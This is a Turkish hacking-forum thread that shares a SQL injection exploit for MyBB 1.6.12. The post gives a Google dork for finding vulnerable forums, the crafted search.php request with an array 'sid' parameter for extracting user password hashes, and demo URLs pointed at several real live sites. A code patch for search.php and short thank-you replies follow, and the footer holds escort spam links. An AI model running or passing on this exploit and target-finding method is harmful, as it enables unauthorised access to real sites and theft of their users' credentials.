MYBB 1.6.12 SQL

K

K53U

Yeni Üye
Katılım
8 Mar 2014
Mesajlar
15
Tepkime puanı
0
Puanları
0
meraba arkadaslar forumda yeniyim umarim kalici olurum ilk paylaşimi mi size sunuyorum.

mybb'nin son surumunde bu acık mevcuttur useer hash cekilebilir.

Exploit :

Kod: 
Google Dork: intext:"powered by Mybb"
search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

Demo :
Kod: 
http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

birtane de heçkir sitesinden demo vereyim : 
http://whitesecurity.org/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

açıgı kapatmak icin sitenizde mybb kurulu dizinde search.php yi acin
bu kod ile
Kod: 
$sid = $db->escape_string($mybb->input['sid']);

Bu kodu degistirin
Kod: 
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);
 
Kzsg

Kzsg

Prof Spys-z
Katılım
28 Ara 2013
Mesajlar
946
Tepkime puanı
0
Puanları
0
eline sağlık kardeşim
 
D

dcy

Yeni Üye
Katılım
2 Kas 2013
Mesajlar
26
Tepkime puanı
0
Puanları
0
sağolasın ama böyle düzeltince olmadı her satırın başına boşluk koymam gerekti. T_STRİNG diye bir hata aldım boşluk koyunca düzeldi şu şekilde.
Kod: 
	if(is_array($mybb->input['sid']))
	$sid = $db->escape_string(implode($mybb->input['sid']));
	else
	$sid = $db->escape_string($mybb->input['sid']);
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012